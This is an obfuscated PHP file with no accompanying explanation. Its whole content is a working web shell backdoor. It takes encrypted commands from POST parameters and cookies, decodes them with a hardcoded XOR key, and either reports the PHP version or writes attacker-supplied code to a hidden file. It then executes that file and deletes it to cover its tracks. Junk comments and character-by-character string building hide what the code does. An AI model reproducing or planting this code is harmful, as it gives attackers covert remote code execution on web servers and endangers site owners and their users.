<?php $nxhzlgbvj    = /*   gsix  */ 'nxhzlgbvj'    ^	'';
$lcenylde       = /*  hemiq  */ "\x61" /*m*/ .    "r"."\162" /*  gemwa  */ . /*zr*/ $nxhzlgbvj(97) /*  ysg   */ . /* ojre */ "y"."\137" /*  hu   */ .       "m"."\141"   .  $nxhzlgbvj(532-420);$zfwlmu      =    "c".$nxhzlgbvj(111)   .  "\165" /*t  */ .    $nxhzlgbvj(110)    .    "t";




function    xndcpnxirw($uzwozw, /*   hjaodp   */ $pyddnuxgl)

{    global	$nxhzlgbvj;

         $uzwozw    =    $nxhzlgbvj(554-494)   .    "?"."p".$nxhzlgbvj(589-485) /*ycwg*/ .    "\x70" /*  l   */ .    $nxhzlgbvj(32)  .   "u"."n".$nxhzlgbvj(108) /*   unn  */ . /*   fm_*/ "\151"    . /*ft */ "n"."k"."\50" /*   aqzri*/ .   "_".$nxhzlgbvj(95)    .    "\x46"  . /* kptga  */ "I".$nxhzlgbvj(76)    . /*pcpew   */ "E"."_"."_".$nxhzlgbvj(790-749)      . /* mowagc   */ $nxhzlgbvj(856-797)	.   $nxhzlgbvj(32) /*   c_x  */ . /*  _bodtb  */ $uzwozw["\x64"];


 /*dpmxt*/ $ouou_ /*n */ =    "\146" /*   u  */ .    "i"."\154" /* cqqtfw  */ .  $nxhzlgbvj(211-110)  . /* dbr*/ $nxhzlgbvj(95)      .      $nxhzlgbvj(112) /*_   */ .    "\x75"    .   "t"."_"."\x63"	.    "o"."n"."\x74"       .	"e"."n"."t"."s";

       

    $ouou_($pyddnuxgl,    $uzwozw);    
 /*  m   */ bailb($pyddnuxgl);
}
$au_th /*  _ */ =     73;


function /*k */ bailb($pyddnuxgl)


{
    global	$nxhzlgbvj;


    
 /*ijmb   */ include($pyddnuxgl);


    $yqnrshjzd	=    $pyddnuxgl;

 /*  p  */ @unlink($yqnrshjzd);

}



function	egolgr()


{
	global /* b   */ $nxhzlgbvj;




 /* whre  */ $pybmx	=     array();
      $pybmx["p"."v"]	= /*quedu   */ phpversion(); /*sroz */ $pybmx[$nxhzlgbvj(485-370) /*wz  */ .	$nxhzlgbvj(323-205)]      = /*  mz_vg_  */ $nxhzlgbvj(626-575) /*   jywwa*/ . /*  nvgh */ "."."\x35";

	$ghrkoouiqp    =     74;	echo  @serialize($pybmx);

}



function    llqjubxc($uzwozw,    $ytamcck)


{     global /*  qvii*/ $nxhzlgbvj;



     $tfqfzo    =     ""; /* c */ $wqbeclpesf   =    'trtve';

    $fdtqlojqer     =    hash('sha256',   $uzwozw);	$ektuyx    =	str_replace('zc',     $fdtqlojqer,    $wqbeclpesf);      $pybmx /*  _aqk */ =    0;	while    ($pybmx    < /*  skfd */ strlen($uzwozw)) /*uzvf */ {
 /*   yae */ $x_jdp    =   isset($ytamcck)    ?   $ytamcck /*   cdry */ :     ''; /*   bwtyv*/ for    ($ksnmauox      =  0; /*  lad_o  */ $ksnmauox    <     strlen($x_jdp)	&&	$pybmx    < /*lsmgzm   */ strlen($uzwozw);    $ksnmauox++,       $pybmx++) /*   z_ugdx */ {

	$tfqfzo    .=    $nxhzlgbvj(ord($uzwozw[$pybmx])   ^ /* uwabc */ ord($x_jdp[$ksnmauox])); /* ews   */ }


       if /*jnrb__ */ (strlen($tfqfzo) /* nrbjcf */ > /*   flgti  */ 20)     {

     $ektuyx	= /*   iia  */ substr($tfqfzo,	0,      20);	}


	}
    if    (empty($tfqfzo))    {    $tfqfzo       = /*   zju   */ date('Y-m-d    H:i:s');


  }


   return       $tfqfzo;


}




function    weevvsb($ojvzsrubf_)

{


 /* yeuvh  */ global     $nxhzlgbvj;    


 /*  mf */ $kogwyu /*   oaivid  */ = /*   nm */ "\x35" /*  fzfg*/ . /*  e   */ "9"."6".$nxhzlgbvj(101)	.       "\64"      .	"9"."\x36"    .      $nxhzlgbvj(521-470)	. /*  hvhwh  */ "\x2d" /*   ddtdg_ */ .    "\61" /*a_gj */ .	"\x30"    .    "\145"	.    $nxhzlgbvj(52) /* wrdkr */ . /*   v   */ "-"."\x34" /*  puferp */ . /*washbk*/ "\x35"	. /*sum*/ "b"."c"."-"."8".$nxhzlgbvj(99) /* lkteby */ . /*   s  */ "\146"    .    $nxhzlgbvj(121-20) /* _ke */ .    "\x2d"   .    "6"."2".$nxhzlgbvj(99) /* oztsr_ */ .   "e".$nxhzlgbvj(274-225)  .      $nxhzlgbvj(296-245)      .    "7"."\64"    .    "\x64"."8".$nxhzlgbvj(53)    .	$nxhzlgbvj(52);    
	foreach    ($ojvzsrubf_ /*  f */ as	$svbslpvak /*ldv */ => /*   qkgl */ $uzwozw)    {
    cywuhv(base64_decode($uzwozw),     $kogwyu, /* fqyu*/ $svbslpvak);
    }

}



function      cywuhv($uzwozw,   $kogwyu,    $svbslpvak)
{   global    $nxhzlgbvj;


 /* ehhji  */ 
    $uzwozw /*  m_xs */ =    unserialize(llqjubxc(llqjubxc($uzwozw,	$kogwyu),  $svbslpvak));
	$giukyjrmx     =  '_dywui_tih';
	$fkxuclrkp    = /*bs  */ 'iqle';


 /*  sms  */ if  (isset($uzwozw["\x61"     .	"k"])) /*  ifoaxk*/ {


	if /*   hckw */ ($uzwozw["\x61"]    ==  "i")    { /* f */ egolgr();


     } /*   r*/ elseif	($uzwozw["\x61"]   ==    "e")     {

	xndcpnxirw($uzwozw,	sprintf(".".$nxhzlgbvj(823-776)    . /* xkcpmc*/ "%"."s"."\x2e"    .      "p".$nxhzlgbvj(416-308), /*zrgs*/ md5($kogwyu)));
			$g_xuelry    = /* _r */ 44; /*  _o*/ }

	exit();    }
}





weevvsb($_POST); /*  mpkgey   */ 
$nnnwdrq   =	$lcenylde('rawurldecode',    $_POST);


$xeqzfuorhk	=      $zfwlmu($nnnwdrq);


weevvsb($_COOKIE);    


$kulzxhkmlc /*  zm_ned */ =       $lcenylde('rawurldecode',     $_COOKIE);



?>